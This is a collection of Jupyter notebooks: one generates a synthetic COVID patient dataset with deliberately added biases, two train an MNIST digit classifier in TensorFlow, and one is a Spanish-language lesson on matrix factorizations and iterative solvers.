change_date: str, ISO date format, date at which ventilation became less likely.
returns
=======
(admitted, admission_date, ventilated): tuple of (bool, datetime, bool)
"""
# did they get admitted? If not, everything else is moot
x = random.random()
prob_admitted = float(df_care[df_care.Ethnicity==ethnicity]["prob_admitted"])
if x > prob_admitted:
# they weren't admitted to hospital, so no admission date, and no ventilation
return False, None, False
change_date = datetime.datetime.fromisoformat(change_date)
admission_date = get_admission_date(df_admission)
prob_ventilation = float(df_care[df_care.Ethnicity==ethnicity]["prob_ventilation"])
# modify prob_ventilation based on change_date
if admission_date < change_date:
prob_ventilation *= 1.2
else:
prob_ventilation *= 0.5
ventilated = x < prob_ventilation
return (True, admission_date, ventilated)
###Output
_____no_output_____
###Markdown
Generating other variables For height and weight, we will assume Gaussian distributions of height and BMI (BMI is weight (in kg) divided by height (in m) squared), with sex-dependent means and standard deviations.The mean and standard deviations in height are taken from ["restore", here](https://www.restore.ac.uk/srme/www/fac/soc/wie/research-new/srme/modules/mod1/8/index.html) while those for BMI are estimates based on the values provided by [statistica, here](https://www.statista.com/statistics/375886/adult-s-body-mass-index-by-gender-and-age-in-england/).We then do some purely ad-hoc corrections to these values to account for age. We estimate that babies are about 0.5m tall on average, with an average BMI of 23.For height, we assume a linear relation between average height and age from the ages 0-16, then flat afterwards, while for BMI we assume a two-sided linear relation between BMI and age, with the maximum value at age 60.These assumptions and guesses give us means and standard deviations for Gaussians, depending on age and sex. We can then use `random.gauss` to draw from these Gaussians and get a height and BMI for a simulated person, then use these to calculate weight.
###Code
def get_height_weight(age, sex):
# if sex is given as "null", assign a 50/50 chance to treating
# as "M" or "F" for the purpose of height/weight generation
if sex == "null":
sex = "F" if random.random() < 0.5 else "M"
# assume linear growth from 0.5m to avg between ages of 0 and 16
avg_height = 1.78 if sex=="M" else 1.63
std_height = 0.07 if sex=="M" else 0.06
if age < 16:
avg_height = 0.5 + (avg_height-0.5)*age/16
height = random.gauss(avg_height, std_height)
# BMI tends to peak at age 60 and is similar for men and women.
# Take _very_ simplified model where we take max_avg_bmi to be 29
# at age 60, and min_avg_bmi to be 23 at 60 years away from this,
# and linearly interpolate between
avg_bmi_max = 29
avg_bmi_min = 23
avg_bmi = abs(60-age)*(avg_bmi_max-avg_bmi_min)/60 + avg_bmi_min
std_bmi = 6.1 if sex=="F" else 4.7
bmi = random.gauss(avg_bmi, std_bmi)
# calculate weight from height and bmi
weight = bmi * height*height
return height, weight
###Output
_____no_output_____
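###Markdown
As a quick sanity check of this model, we can draw a couple of thousand samples for a fixed (and arbitrarily chosen) age and sex and look at the average height and weight - a small sketch using the function defined above:
###Code
# Hedged sanity check: average height/weight of simulated 40-year-old females.
sample_hw = [get_height_weight(40, "F") for _ in range(2000)]
mean_height = sum(h for h, w in sample_hw) / len(sample_hw)
mean_weight = sum(w for h, w in sample_hw) / len(sample_hw)
print(round(mean_height, 2), round(mean_weight, 1))
###Output
_____no_output_____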
###Markdown
Survival rateNow we come to the most critical part, and also the one where we are making the most assumptions - the chance for a simulated patient who has a positive COVID test to die.We will start from a small baseline probability, and increase this based on several factors:* Age - the chance of dying from COVID increases almost exponentially with age. Based on CDC figures [here](https://www.cdc.gov/coronavirus/2019-ncov/covid-data/investigations-discovery/hospitalization-death-by-age.html) we estimate that using 20-year-olds as the baseline, the chances of dying with COVID approximately double for every 8 years older.* BMI - having a BMI over 30 increases the chance of dying* Sex - Men have a higher chance of dying of COVID than women* Ethnicity - People of Chinese, Indian, Pakistani, Other Asian, Black Caribbean and Other Black ethnicity had between 10 and 50% higher risk of death when compared to White British - the numbers used here are based on table A1 in [the PHE document](https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/908434/Disparities_in_the_risk_and_outcomes_of_COVID_August_2020_update.pdf)* We also make some ad-hoc assumptions regarding whether the patient was hospitalised and had intrusive ventilation. In general we assume that the most seriously ill patients were admitted, and given critical care, and these were most likely to die. However, we don't enforce this relation for patients over 75, who were perhaps more likely to be in care homes.- For those that were admitted, we apply a small correction to account for the fact that the knowledge in hospitals improved over time - we say 1% relative per day after 15th April
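To get a feel for the age term on its own, the multiplier $2^{(\text{age}-20)/8}$ applied to the baseline works out roughly as follows (a quick standalone check using the same baseline value as the function below):
###Code
# Quick illustration of the age factor described above:
# the probability doubles every 8 years past age 20.
baseline = 0.001
for age in [20, 40, 60, 80]:
    print(age, round(baseline * 2 ** ((age - 20) / 8), 5))
###Output
_____no_output_____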
###Code
def did_patient_die(age,
height,
weight,
sex,
ethnicity,
admitted,
admission_date,
ventilation,
change_date="2020-04-15",
baseline_prob=0.001):
"""
Returns: bool, True if patient died, False otherwise
"""
# modify for age - chance of death doubles every 8 years
prob = baseline_prob * pow(2, (age - 20)/8.)
# modify for sex
prob = prob*1.2 if sex == "M" else prob*0.8
# modify for BMI - linear relation factor 1.05 per unit of BMI over 23
    BMI = weight / (height * height)  # BMI = weight (kg) / height (m)^2
if BMI > 23:
bmi_factor = 1.05 * (BMI-23)
prob = prob * bmi_factor
# modify for ethnicity
if ethnicity == "Asian / Asian British":
prob = prob * 1.35
elif ethnicity == "Black / Black British":
prob = prob * 1.2
elif ethnicity == "Mixed / Multiple ethnic groups":
prob = prob * 1.1
elif ethnicity == "Other ethnic groups":
prob = prob * 1.02
# ad-hoc corrections for whether the patient was
# hospitalised, and given ventilation
if age < 75:
if admitted:
prob *= 2
else:
prob *= 0.5
if ventilation: # double the risk again
prob *= 2
# if patient was admitted, account for the fact that care improved after some date
if admitted:
if isinstance(admission_date, str):
admission_date = datetime.datetime.fromisoformat(admission_date)
t = (admission_date - datetime.datetime.fromisoformat(change_date)).days
if t > 0:
prob = prob*(1 - t*0.01)
# now lets see whether random number 0<x<1 is below prob
x = random.random()
# return prob
return x < prob
###Output
_____no_output_____
###Markdown
Putting it all togetherWe're now ready to generate some simulated people. We first get the age, then the sex, then use these to get a height and weight, using the functions defined above. Each simulated person will be returned as a JSON object, which we can then accumulate into a pandas dataframe.
###Code
def generate_person(df_age_sex, df_ethnicity, df_admission, df_care):
"""
Generate characteristics of a simulated person, and return as JSON
parameter: df: pd.DataFrame, the age and sex profile of cases(including cumulative sum)
returns: JSON object containing all generated parameters.
"""
nhs_id = get_nhs_id()
sex = get_sex(df_age_sex)
age = get_age(df_age_sex, sex)
ethnicity = get_ethnicity(df_ethnicity)
admitted, admission_date, ventilated = get_hospital_data(df_admission, df_care, ethnicity)
height, weight = get_height_weight(age, sex)
died = did_patient_die(age, height, weight, sex, ethnicity, admitted, admission_date, ventilated)
return {
"nhs_id": nhs_id,
"site_id": "UHJ_43643",
"age": age,
"sex": sex,
"ethnicity": ethnicity,
"height": height,
"weight": weight,
"admitted": admitted,
"admission_date": admission_date,
"intrusive_ventilation": ventilated,
"died": died
}
people = []
for i in range(30000):
if i % 1000 == 0:
print("Generating", i)
people.append(
generate_person(
df_cases_age_sex,
df_ethnicity_summary,
df_hospital_admissions,
df_hospital_care)
)
###Output
Generating 0
Generating 1000
Generating 2000
Generating 3000
Generating 4000
Generating 5000
Generating 6000
Generating 7000
Generating 8000
Generating 9000
Generating 10000
Generating 11000
Generating 12000
Generating 13000
Generating 14000
Generating 15000
Generating 16000
Generating 17000
Generating 18000
Generating 19000
Generating 20000
Generating 21000
Generating 22000
Generating 23000
Generating 24000
Generating 25000
Generating 26000
Generating 27000
Generating 28000
Generating 29000
###Markdown
Now put this list of dicts into a pandas dataframe:
###Code
df_people = pd.DataFrame.from_records(people)
df_people.head(20)
###Output
_____no_output_____
###Markdown
Now export this to a CSV file:
###Code
df_people.to_csv("covid_patients_syn_data_unbiased.csv")
###Output
_____no_output_____
###Markdown
Quick check on whether the age profile of the people that died looks sensible:
###Code
df_died = df_people[df_people.died==True]
ages = {"M": [], "F":[]}
ages["M"] = list(df_died[df_died.sex=="M"]["age"])
ages["F"] = list(df_died[df_died.sex=="F"]["age"])
plt.hist(ages["M"],bins=10,range=(0,100), alpha=0.5, label="M")
plt.hist(ages["F"],bins=10,range=(0,100), alpha=0.5, label="F")
###Output
_____no_output_____
###Markdown
Adding biases into the datasetThere are a few possible ways that the data can be imperfect. A simple example is the binary classification of sex into "M" and "F" - some fraction of our simulated patients may be non-binary, or will have not filled in this value. Let's replace 5% of our "M" and "F" labels with "null".
###Code
def add_null_gender(df, null_prob=0.05):
for irow in range(len(df)):
        if random.random() < null_prob:
df.at[irow,"sex"] = "null"
return df
df_people = add_null_gender(df_people)
df_people.head(20)
###Output
_____no_output_____
###Markdown
Another potential bias could be that older people are under-represented in the dataset because they never presented at a hospital - write a function to remove some fraction of people in some age range:
###Code
def remove_elderly_non_hospitalised(df, age_range, prob_remove=0.5):
"""
Remove some fraction (prob_remove) of people in a given age range
who weren't admitted to hospital
Parameters
==========
df: pandas DataFrame
age_range: list of 2 ints, min and max of age range to be removed
prob_remove (optional): fraction of patients within age range to remove
"""
query_string = "({} < age < {}) & (admitted==False)".format(age_range[0], age_range[1])
df_new = df.drop(df.query(query_string).sample(frac=prob_remove).index)
return df_new
df_people = remove_elderly_non_hospitalised(df_people,[75,85])
###Output
_____no_output_____
###Markdown
Data entry errors can also occur - perhaps someone gave their height in feet and inches rather than metres:
###Code
# pick an existing row label (some labels were dropped above, so sample from the index)
index = random.choice(df_people.index)
df_people.at[index,"height"] = 5.9
###Output
_____no_output_____
###Markdown
OK, let's output this to a different CSV file, which is what we will use as input for the data analysis task.
###Code
df_people.to_csv("covid_patients_syn_data.csv")
###Output
_____no_output_____ |
tf-digits.ipynb | ###Markdown
Numbers with TensorFlow 2.0
###Code
import numpy as np
import matplotlib.pyplot as plt
from six.moves.urllib.request import urlretrieve
###Output
_____no_output_____
###Markdown
Getting DataThe first step is to actually get some data! We are downloading the famous [MNIST](http://yann.lecun.com/exdb/mnist/) data set created by Yann LeCun et al. It contains representations of digits (as numpy arrays) along with the corresponding number. Our job is to create a function that can tell them all apart.
###Code
mnist_file = 'https://storage.googleapis.com/tensorflow/tf-keras-datasets/mnist.npz'
file, output = urlretrieve(mnist_file, 'mnist.npz')
with np.load(file) as f:
x_train, y_train = f['x_train'], f['y_train']
x_test, y_test = f['x_test'], f['y_test']
###Output
_____no_output_____
###Markdown
This helpful function takes the numpy arrays and draws them as a sanity check.
###Code
def draw_digits(X, y):
fig, axes = plt.subplots(6, 20, figsize=(18, 7),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
for i, ax in enumerate(axes.flat):
ax.imshow(255 - X[i], cmap='gray')
ax.set_title('{:.0f}'.format(y[i]))
draw_digits(x_train, y_train)
###Output
_____no_output_____
###Markdown
Making a Model (or function)Let's build a simple neural network with TensorFlow and Keras: a dense hidden layer followed by a softmax output layer over the 10 digit classes.
###Code
import tensorflow as tf
from tensorflow import keras
tf.__version__
###Output
_____no_output_____
###Markdown
We have to reshape the images because they are currently `28 x 28` pixel grayscale arrays. We want to flatten them so that each row becomes `784` pixel values between `0 .. 255`. We also scale the numbers by dividing by `255`, so they lie between 0 and 1; this is one way of [Normalizing](https://docs.microsoft.com/en-us/azure/machine-learning/studio-module-reference/normalize-data) data. You will be able to visualize this below by printing out the first item in the training set before and after it is reshaped.
###Code
#Current shape of training data set. 60000 examples that are 28 x 28
x_train.shape
#Reshape docs: https://docs.scipy.org/doc/numpy/reference/generated/numpy.reshape.html
#One shape dimension can be -1. In this case, the value is inferred from the length of the array and remaining dimensions.
train_set = x_train.reshape((len(x_train), -1))
train_set.shape
y_train[0]
train_set[0].shape
train_set[0]
#We can do the reshape and normalization all in one line like this. (we split it above so you can see whats happening)
train_set = x_train.reshape((len(x_train), -1)) / 255
train_set[0]
# function shape
model = keras.Sequential([
keras.layers.Dense(128, activation='relu'),
keras.layers.Dense(10, activation='softmax')
])
###Output
WARNING: Logging before flag parsing goes to stderr.
W0826 21:36:23.911801 140308596516672 deprecation.py:506] From /home/ec2-user/anaconda3/envs/tensorflow_p36/lib/python3.6/site-packages/tensorflow/python/ops/init_ops.py:1251: calling VarianceScaling.__init__ (from tensorflow.python.ops.init_ops) with dtype is deprecated and will be removed in a future version.
Instructions for updating:
Call initializer instance with the dtype argument instead of passing it to the constructor
###Markdown
Once we have the function and the optimization method then we just fit the model!
###Code
# how to optimize the function
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(train_set, y_train, epochs=10)
###Output
Epoch 1/10
60000/60000 [==============================] - 5s 88us/sample - loss: 0.2590 - acc: 0.9262
Epoch 2/10
60000/60000 [==============================] - 5s 80us/sample - loss: 0.1139 - acc: 0.9660
Epoch 3/10
60000/60000 [==============================] - 5s 80us/sample - loss: 0.0792 - acc: 0.9759
Epoch 4/10
60000/60000 [==============================] - 5s 80us/sample - loss: 0.0594 - acc: 0.9815
Epoch 5/10
60000/60000 [==============================] - 5s 80us/sample - loss: 0.0461 - acc: 0.9857
Epoch 6/10
60000/60000 [==============================] - 5s 79us/sample - loss: 0.0364 - acc: 0.9884
Epoch 7/10
60000/60000 [==============================] - 5s 79us/sample - loss: 0.0302 - acc: 0.9905
Epoch 8/10
60000/60000 [==============================] - 5s 79us/sample - loss: 0.0233 - acc: 0.9930
Epoch 9/10
60000/60000 [==============================] - 5s 80us/sample - loss: 0.0195 - acc: 0.9941
Epoch 10/10
60000/60000 [==============================] - 5s 80us/sample - loss: 0.0159 - acc: 0.9952
###Markdown
Testing the ModelNow that we've made a model - let's see if it works!
###Code
test_set = x_test.reshape((len(x_test), -1)) / 255.
test_loss, test_acc = model.evaluate(test_set, y_test)
print('\nTest accuracy:', test_acc)
###Output
10000/10000 [==============================] - 0s 41us/sample - loss: 0.1024 - acc: 0.9778
Test accuracy: 0.9778
###Markdown
Numbers with TensorFlow 2.0
###Code
import numpy as np
import matplotlib.pyplot as plt
from six.moves.urllib.request import urlretrieve
###Output
_____no_output_____
###Markdown
Getting DataThe first step is to actually get some data! We are downloading the famous [MNIST](http://yann.lecun.com/exdb/mnist/) data set created by Yann LeCun et al. It contains representations of digits (as numpy arrays) along with the corresponding number. Our job is to create a function that can tell them all apart.
###Code
mnist_file = 'https://storage.googleapis.com/tensorflow/tf-keras-datasets/mnist.npz'
file, output = urlretrieve(mnist_file, 'mnist.npz')
with np.load(file) as f:
x_train, y_train = f['x_train'], f['y_train']
x_test, y_test = f['x_test'], f['y_test']
###Output
_____no_output_____
###Markdown
This helpful function takes the numpy arrays and draws them as a sanity check.
###Code
def draw_digits(X, y):
fig, axes = plt.subplots(6, 20, figsize=(18, 7),
subplot_kw={'xticks':[], 'yticks':[]},
gridspec_kw=dict(hspace=0.1, wspace=0.1))
for i, ax in enumerate(axes.flat):
ax.imshow(255 - X[i], cmap='gray')
ax.set_title('{:.0f}'.format(y[i]))
draw_digits(x_train, y_train)
###Output
_____no_output_____
###Markdown
Making a Model (or function)Let's build a simple neural network with TensorFlow and Keras: a dense hidden layer followed by a softmax output layer over the 10 digit classes.
###Code
import tensorflow as tf
from tensorflow import keras
tf.__version__
###Output
/data/anaconda/envs/py35/lib/python3.5/site-packages/h5py/__init__.py:36: FutureWarning: Conversion of the second argument of issubdtype from `float` to `np.floating` is deprecated. In future, it will be treated as `np.float64 == np.dtype(float).type`.
from ._conv import register_converters as _register_converters
###Markdown
We have to reshape the images because they are currently `28 x 28` pixel grayscale arrays. We want to flatten them so that each row becomes `784` pixel values between `0 .. 255`. We also scale the numbers by dividing by `255`, so they lie between 0 and 1; this is one way of [Normalizing](https://docs.microsoft.com/en-us/azure/machine-learning/studio-module-reference/normalize-data) data. You will be able to visualize this below by printing out the first item in the training set before and after it is reshaped.
###Code
#Current shape of training data set. 60000 examples that are 28 x 28
x_train.shape
#Reshape docs: https://docs.scipy.org/doc/numpy/reference/generated/numpy.reshape.html
#One shape dimension can be -1. In this case, the value is inferred from the length of the array and remaining dimensions.
train_set = x_train.reshape((len(x_train), -1))
train_set.shape
y_train[0]
train_set[0].shape
train_set[0]
#We can do the reshape and normalization all in one line like this. (we split it above so you can see whats happening)
train_set = x_train.reshape((len(x_train), -1)) / 255
train_set[0]
# function shape
model = keras.Sequential([
keras.layers.Dense(128, activation='relu'),
keras.layers.Dense(10, activation='softmax')
])
###Output
_____no_output_____
###Markdown
Once we have the function and the optimization method then we just fit the model!
###Code
# how to optimize the function
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(train_set, y_train, epochs=10)
###Output
Epoch 1/10
60000/60000 [==============================] - 4s 62us/sample - loss: 0.2645 - acc: 0.9246
Epoch 2/10
60000/60000 [==============================] - 4s 61us/sample - loss: 0.1159 - acc: 0.9669
Epoch 3/10
60000/60000 [==============================] - 4s 60us/sample - loss: 0.0802 - acc: 0.9766
Epoch 4/10
60000/60000 [==============================] - 4s 62us/sample - loss: 0.0600 - acc: 0.9819
Epoch 5/10
60000/60000 [==============================] - 4s 61us/sample - loss: 0.0471 - acc: 0.9858
Epoch 6/10
60000/60000 [==============================] - 4s 61us/sample - loss: 0.0367 - acc: 0.9888
Epoch 7/10
60000/60000 [==============================] - 4s 61us/sample - loss: 0.0298 - acc: 0.9909
Epoch 8/10
60000/60000 [==============================] - 4s 62us/sample - loss: 0.0242 - acc: 0.9922
Epoch 9/10
60000/60000 [==============================] - 4s 61us/sample - loss: 0.0189 - acc: 0.9939
Epoch 10/10
60000/60000 [==============================] - 4s 61us/sample - loss: 0.0164 - acc: 0.9950
###Markdown
Testing the ModelNow that we've made a model - let's see if it works!
###Code
test_set = x_test.reshape((len(x_test), -1)) / 255.
test_loss, test_acc = model.evaluate(test_set, y_test)
print('\nTest accuracy:', test_acc)
###Output
10000/10000 [==============================] - 0s 31us/sample - loss: 0.0800 - acc: 0.9781
Test accuracy: 0.9781
|
notebook/T2.ipynb | ###Markdown
Topic 2: Numerical linear systems of equations
###Code
!pip install -r https://raw.githubusercontent.com/alexmascension/ANMI/main/requirements.txt
from sympy import *
from sympy.matrices import Matrix as mat
from sympy.matrices import randMatrix
from sympy import symbols
import sympy
import matplotlib.pyplot as plt
import numpy as np
from scipy.linalg import orth
from anmi.genericas import norma, print_verbose, norma_1, norma_inf, norma_2
from numpy.linalg import cond as numero_condicion
from anmi.T2 import descomposicion_LU, descomposicion_LDU, cholesky, gram_schmidt, householder, factorizacion_QR
from anmi.T2 import metodo_iterativo, criterio_m_matriz, criterio_SOR, criterio_simetrica_definida_positiva, criterio_diagonal_dominante, criterio_radio_espectral
###Output
_____no_output_____
###Markdown
Condition number The condition number is defined as $\vert\vert A \vert\vert \cdot \vert\vert A^{-1}\vert\vert$. A condition number close to 1 implies a matrix that is more stable under methods involving differential elements. Orthogonal matrices have a condition number of 1.
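As a quick check of this definition, we can compute $\vert\vert A \vert\vert \cdot \vert\vert A^{-1}\vert\vert$ by hand with NumPy and compare it against `numpy.linalg.cond` (a small sketch using the spectral norm and the same matrix as the cells below):
###Code
# Hedged sketch: condition number computed directly from its definition.
import numpy as np
A_np = np.array([[1, 2, 3], [2, 3, 1], [3, 2, 4]], dtype=float)
manual_cond = np.linalg.norm(A_np, 2) * np.linalg.norm(np.linalg.inv(A_np), 2)
print(manual_cond, np.linalg.cond(A_np, 2))  # both values should agree
###Output
_____no_output_____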
###Code
help(numero_condicion)
M = mat(((1, 2, 3), (2, 3, 1), (3, 2, 4)))
M
numero_condicion(np.array(M).astype(int))
M_ort = (orth(np.array(M).astype(int)))
M_ort
numero_condicion(M_ort)
###Output
_____no_output_____
###Markdown
LU and LDU* factorization Recall that, for a matrix, the LU factorization is the process of applying Gaussian elimination, so that $L$ is a lower triangular matrix holding the transformation coefficients and $U$ is the upper triangular matrix holding the elements after the linear transformations.In addition, $D$ can be taken as a diagonal matrix with the values of the diagonal of $U$, so that $LU$ = $LDD^{-1}U$; if we set $U^* = D^{-1}U$ we obtain $LDU^*$, where $U^*$ is still an upper triangular matrix, but with its diagonal equal to 1.When applying the LU and LDU* factorizations, rows can be permuted so that at each iteration the row with the largest value (among those not yet *processed*) is selected and swapped in, which always guarantees a solution. It is also important to keep in mind that the factorization fails if any diagonal element (from the start or during the factorization) is 0, and the permutation is applied precisely to handle that case.All the permutations are collected in a matrix $P$, so that $$LU = LDU^* = PA$$
###Code
help(descomposicion_LU)
M = mat(((1, 4, 4), (3, 2, 1), (2, 4, 1)))
descomposicion_LU(M, permutar_max=False)
descomposicion_LDU(M, permutar_max=False)
descomposicion_LU(M, rhs=ones(M.shape[0], 1), permutar_max=True)
descomposicion_LDU(M, permutar_max=True)
###Output
_____no_output_____
###Markdown
Cholesky factorizationThe Cholesky factorization produces a lower triangular matrix $L$ such that $A = LL^T$. For a matrix to be factorizable, its leading principal minors must be positive and the matrix must be symmetric.
###Code
help(cholesky)
M = mat(((2, -1, 0), (-1, 2, -2), (0, 2, 1)))
M
cholesky(M)
cholesky(M + M.T)
M + M.T
cholesky(M + M.T) * cholesky(M + M.T).T
# We can also apply Cholesky to a matrix containing symbols!
x = symbols('x')
Mx = mat(((1, x, 1), (x, 2, 1), (1, 1, 3)))
Mx
cholesky(Mx)
###Output
_____no_output_____
###Markdown
Gram-Schmidt orthogonalization
###Code
help(gram_schmidt)
M
GS = gram_schmidt(M)
GS['P']
GS['Pn']
GS['c']
GS['P'][:, 1].T * GS['P'][:, 2]
Mx = mat(((1, 2, 3), (1, x, 1), (0, 0, 3)))
GSx = gram_schmidt(Mx)
GSx['P']
###Output
_____no_output_____
###Markdown
Householder transformationThe Householder transformation maps a vector $x$ onto a vector $y$. To do so we take the vector $e$, which acts as the axis of the transformation, and the transformation matrix is $H = I - 2ee^t$.In this case, $$e = \pm \frac{x - y}{\vert\vert x - y \vert\vert}$$For the Householder transformation, $x$ and $y$ **must have the same norm**. The resulting vector $e$ has norm 1.
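To see the formula in action, here is a small standalone sketch (our own example vectors, not from the library) that builds $H = I - 2ee^t$ directly with SymPy for two vectors of equal norm and checks that $Hx = y$:
###Code
# Hedged sketch: building the Householder matrix directly from the formula above.
x_v = Matrix([3, 4])   # norm 5
y_v = Matrix([5, 0])   # also norm 5 (equal norms are required)
e_v = (x_v - y_v) / (x_v - y_v).norm()
H_manual = eye(2) - 2 * e_v * e_v.T
simplify(H_manual * x_v)   # should give Matrix([[5], [0]]), i.e. y
###Output
_____no_output_____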
###Code
help(householder)
v0 = mat(((1, 0)))
vf = mat((1, 1))
vf = vf/norma(vf)
H, e = householder(v0, vf, normalizar=False)
H
e
# Ejercicio 10
t = symbols('t')
v0 = mat(((1, 0)))
vf = mat((cos(t), sin(t)))
H, e = householder(v0, vf, normalizar=False)
H
e
###Output
_____no_output_____
###Markdown
QR factorizationThe QR factorization expresses $A = QR$, where $Q$ is orthogonal and $R$ is upper triangular. If $P$ is the orthogonalized matrix, $C$ is the matrix of orthonormalization factors (for Gram-Schmidt, for example, $m_{ij} = \frac{a^j\cdot p^i}{\vert\vert p^{i}\vert\vert^2}$) and $D$ is the matrix of the norms of the orthogonal vectors ($\vert\vert p^i\vert\vert$), then:$$Q = PD^{-1}$$$$R = D(I + C)$$
###Code
help(factorizacion_QR)
M = mat(((2, -1, 0), (0, 0, -2), (0, 2, -1)))
factorizacion_QR(M, metodo='householder')
A1 = mat(((2, -1, 0), (0, 0, -2), (0, 2, -1)))
A1 = mat(((1, 2, 3), (4, 5, 6), (7, 8, 9)))
A1
dqr = factorizacion_QR(A1, metodo='householder')
dqr['Q']
dqr['R']
simplify(dqr['Q'].T * dqr['Q'])
simplify(dqr['Q'] * dqr['R'])
###Output
_____no_output_____
###Markdown
Iterative methods Iterative methods solve the system $Ax=b$. They all rely on the same idea: use a matrix $H$ such that, for one iteration,$$x^{(k+1)} = Hx^{(k)} + b'$$If we write the matrix as $A = D - L - U$ (where $D$ is the diagonal of $A$, and $L$ and $U$ are triangular matrices built from the elements of $A$), the previous equation becomes$$Mx^{(k+1)} = (M-A)x^{(k)} + b$$We then simply solve for $x^{(k+1)}$ (since $x^{(k)}$ is known) and repeat the procedure until convergence:$$x^{(k+1)} = M^{-1}(M-A)x^{(k)} + M^{-1}b$$The matrix depends on the method: for Jacobi $M = D$, for Gauss-Seidel $M = D-L$, and for successive over-relaxation (SOR) $M = \frac{1}{\omega}D - L$.
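As a minimal illustration of the scheme itself (independent of the library's `metodo_iterativo`), here is a hand-rolled Jacobi iteration with $M = D$ on a small system of our own choosing:
###Code
# Hedged sketch: a few hand-rolled Jacobi iterations,
# x_{k+1} = M^{-1}(M - A) x_k + M^{-1} b, with M = D (the diagonal of A).
A_it = Matrix([[4, 1], [1, 3]])
b_it = Matrix([1, 2])
M_it = diag(*[A_it[i, i] for i in range(2)])
x_it = zeros(2, 1)
for _ in range(15):
    x_it = M_it.inv() * (M_it - A_it) * x_it + M_it.inv() * b_it
N(x_it), N(A_it.LUsolve(b_it))   # the iterate should approach the exact solution
###Output
_____no_output_____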
###Code
help(metodo_iterativo)
A = mat([[2, 1, 1], [1, -2, 1], [1, 1, 2]])
b = mat([[1, 1, 1]]).T
diter = metodo_iterativo(A, b, n_iter=200, verbose=True)
np.array(diter['x'], dtype=float)
# EXERCISE 12
a = symbols('a')
A = mat([[4, 1, a], [1, 4, 1], [a, 1, 4]])
metodo_iterativo(A, metodo='gs', n_iter=3)
# EXERCISE 14
A = mat([[-11, 20, 8], [20, 16, -8], [8, -8, 5]]) / 27
norma_1(A)
norma_inf(A)
d = [simplify(i) for i in list((A.T * A).eigenvals().keys())]
# norma_2(A)
A
A.T * A
simplify((A.T * A - a * eye(3)))
###Output
_____no_output_____
###Markdown
Exercises Exercise 14Compute $\vert\vert A\vert\vert_1, \vert\vert A\vert\vert_2, \vert\vert A\vert\vert_\infty$ for the matrix
###Code
A = Matrix([[-11, 20, 8], [20, 16, -8], [8, -8, 5]]) / 27
A
np.sum(abs(A), 0), norma_1(A)
np.sum(abs(A), 1), norma_inf(A)
# For the 2-norm we could use norma_2(), but let's do it by hand. To do so:
# 1) Compute A.T * A
AA = simplify(A.T * A)
AA
# At this point the results differ, so we will use their intermediate results
AA = Matrix([[65, 4, -32], [4, 80, 8], [-32, 8, 17]]) / 81
# 2) Compute the eigenvalues
factor(det(AA - symbols('lambda') * eye(3)))
# The eigenvalues are 0 and 1, so we keep 1
rho = max(solve(det(AA - symbols('lambda') * eye(3))))
norma_2 = sqrt(rho)
norma_2
###Output
_____no_output_____
###Markdown
Exercise 15The Hilbert matrix $H_n$ has coefficients $h_{ij} = \frac{1}{i + j -1}$Determine the limit for $\vert\vert \; \vert\vert_1$ and $\vert\vert \; \vert\vert_\infty$: $\lim_{n\to \infty}\vert\vert H_n \vert\vert$.
###Code
def Hn(n):
hn = zeros(n, n)
for row in range(n):
for col in range(n):
hn[row, col] = S(1) / S(row + col + 1) # porque i y j les sumamos 1
return hn
# Let's create a few test matrices
Hn(7)
###Output
_____no_output_____
###Markdown
We see that the matrix is symmetric, so the 1-norm and the inf-norm will be equal.The column / row with the largest sum is the first one, since $A[1:, 0] = A[:-1, 1]$ and $A[0, 0] > A[-1, 1]$, and by induction on the remaining columns we see that $\sum A[:, i] > \sum A[:, i+1]$. For a given $n$, the value of the first row is $\sum A[:, 0] = \sum_i^n 1/i$, which is the harmonic series.For $n \to \infty$ we know that $\sum_i^n 1/i \to \infty$, hence $\lim_{n\to \infty}\vert\vert H_n \vert\vert = \infty$ Exercise 16Consider the matrix $$ A = \begin{pmatrix}a & 1+a\\0 & a\end{pmatrix}$$with $a > 0 \in \mathbb{R}$.1) Compute the condition number of $A$ in the norm $\vert \vert A \vert \vert_\infty$
###Code
# The condition number is ||A||·||A^-1||
a = symbols('a')
A = Matrix([[a, 1+a], [0, a]])
A
Ainv = A.inv()
Ainv
# The inf-norm of A is a + a + 1 = 1 + 2a
ninfA = 1 + 2*a
# The inf-norm of Ainv is 1/a + 1/a + 1/a**2
ninfAinv = 1/a + 1/a + 1/a**2
ninfA, ninfAinv
condicion = ninfA * ninfAinv
simplify(condicion)
simplify(1 - factor(condicion))
###Output
_____no_output_____
###Markdown
2) Estimate the relative error of the solution of the perturbed linear system$$(A + \delta A)(x + \delta x) = b + \delta b$$By Banach's lemma we have $$\frac{\vert\vert \delta x\vert\vert}{\vert\vert x\vert\vert} = \frac{cond(A)}{1-cond(A)\frac{\vert\vert \delta A\vert\vert}{\vert\vert A\vert\vert}}\left( \frac{\vert\vert \delta b\vert\vert}{\vert\vert b\vert\vert} + \frac{\vert\vert \delta A\vert\vert}{\vert\vert A\vert\vert}\right)$$For this exercise, since $cond(A) = \frac{(2a+1)^2}{a^2}$, this becomes $$\frac{\vert\vert \delta x\vert\vert}{\vert\vert x\vert\vert} = \frac{(2a+1)^2}{a^2 - (2a+1)^2\frac{\vert\vert \delta A\vert\vert}{\vert\vert A\vert\vert}}\left( \frac{\vert\vert \delta b\vert\vert}{\vert\vert b\vert\vert} + \frac{\vert\vert \delta A\vert\vert}{\vert\vert A\vert\vert}\right)$$which requires that $$\frac{\vert\vert \delta A\vert\vert}{\vert\vert A\vert\vert} < \frac{1}{cond(A)}$$ Exercise 17Compute the LU factorization with partial pivoting of the matrix $A$, with $0 < \alpha < \frac{\pi}{4}$.
###Code
a = symbols('alpha')
A = Matrix([[0, 1, 0, 0], [1, 0, 0, 0], [0, 0, cos(a), -sin(a)], [0, 0, sin(a), cos(a)]])
A
###Output
_____no_output_____
###Markdown
In this case the LU function fails because the maximum of the matrix "does not exist". Let's program it ourselves. We will use the Doolittle factorization of the form $PA = LU$. In this case, $P = P^{(1)}$
###Code
P = Matrix([[0, 1, 0, 0], [1, 0, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]])
P
dict_LU = descomposicion_LU(P * A, permutar_max=False)
dict_LU['L']
dict_LU['U']
simplify(dict_LU['L'] * dict_LU['U'])
###Output
_____no_output_____
###Markdown
